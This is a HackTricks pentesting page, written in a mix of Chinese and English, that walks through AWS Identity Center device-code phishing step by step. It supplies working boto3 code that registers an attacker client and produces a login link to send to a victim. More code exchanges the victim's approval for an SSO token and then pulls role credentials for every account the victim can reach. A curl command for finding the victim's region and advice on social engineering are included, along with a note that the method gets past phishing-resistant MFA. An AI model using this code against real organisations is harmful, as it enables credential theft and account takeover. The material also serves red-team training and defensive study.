AWS - Identity Center & SSO Unauthenticated Enum

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

AWS Device Code Phishing

Initially proposed in this blog post, it’s possible to send a link to a user using AWS SSO that if the user accepts the attacker will be able to get a token to impersonate the user and access all the roles the user is able to access in the Identity Center.

为了执行该攻击,前提条件是:

  • 受害者需要使用 Identity Center
  • 攻击者必须知道受害者使用的 subdomain <victimsub>.awsapps.com/start

仅凭上述信息,attacker will be able to send a link to the user,如果被 accepted 将授予 attacker access over the AWS user 账户的访问权限。

Attack

  1. Finding the subdomain

攻击者的第一步是找出受害公司在其 Identity Center 中使用的 subdomain。可以通过 OSINTguessing + BF 完成,因为大多数公司会在此使用它们的名称或名称的变体。

有了这些信息,就可以获取 Identity Center 配置所在的 region:

curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
"region":"us-east-1
  1. 为受害者生成链接并发送

运行以下代码以生成 AWS SSO 登录链接,以便受害者进行身份验证。
演示时,请在 python 控制台中运行此代码,并且不要退出它,因为稍后你将需要一些对象来获取 token:

import boto3

REGION = 'us-east-1' # CHANGE THIS
AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS

sso_oidc = boto3.client('sso-oidc', region_name=REGION)
client = sso_oidc.register_client(
clientName = 'attacker',
clientType = 'public'
)

client_id = client.get('clientId')
client_secret = client.get('clientSecret')
authz = sso_oidc.start_device_authorization(
clientId=client_id,
clientSecret=client_secret,
startUrl=AWS_SSO_START_URL
)

url = authz.get('verificationUriComplete')
deviceCode = authz.get('deviceCode')
print("Give this URL to the victim: " + url)

使用你出色的 social engineering 技能,将生成的链接发送给受害者!

  1. 等待受害者接受

如果受害者已经登录 AWS,他只需接受授予权限;如果没有,则需要先登录然后接受授予权限
This is how the promp looks nowadays:

  1. 获取 SSO access token

如果受害者接受了提示,运行以下代码以生成一个冒充该用户的 SSO token

token_response = sso_oidc.create_token(
clientId=client_id,
clientSecret=client_secret,
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceCode
)
sso_token = token_response.get('accessToken')

SSO access token 有效期为 8h

  1. 冒充用户
sso_client = boto3.client('sso', region_name=REGION)

# List accounts where the user has access
aws_accounts_response = sso_client.list_accounts(
accessToken=sso_token,
maxResults=100
)
aws_accounts_response.get('accountList', [])

# Get roles inside an account
roles_response = sso_client.list_account_roles(
accessToken=sso_token,
accountId=<account_id>
)
roles_response.get('roleList', [])

# Get credentials over a role

sts_creds = sso_client.get_role_credentials(
accessToken=sso_token,
roleName=<role_name>,
accountId=<account_id>
)
sts_creds.get('roleCredentials')

Phishing the unphisable MFA

有趣的是,之前的攻击 works even if an “unphisable MFA” (webAuth) is being used。这是因为之前的 workflow never leaves the used OAuth domain。与其他需要替换登录域的钓鱼攻击不同,在这种情况下 device code workflow 已被设置为某个 code is known by a device,用户甚至可以在不同的机器上登录。如果用户接受提示,device 只要 knowing the initial code,就能够为该用户 retrieve credentials

For more info about this check this post.

自动化工具

参考资料

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks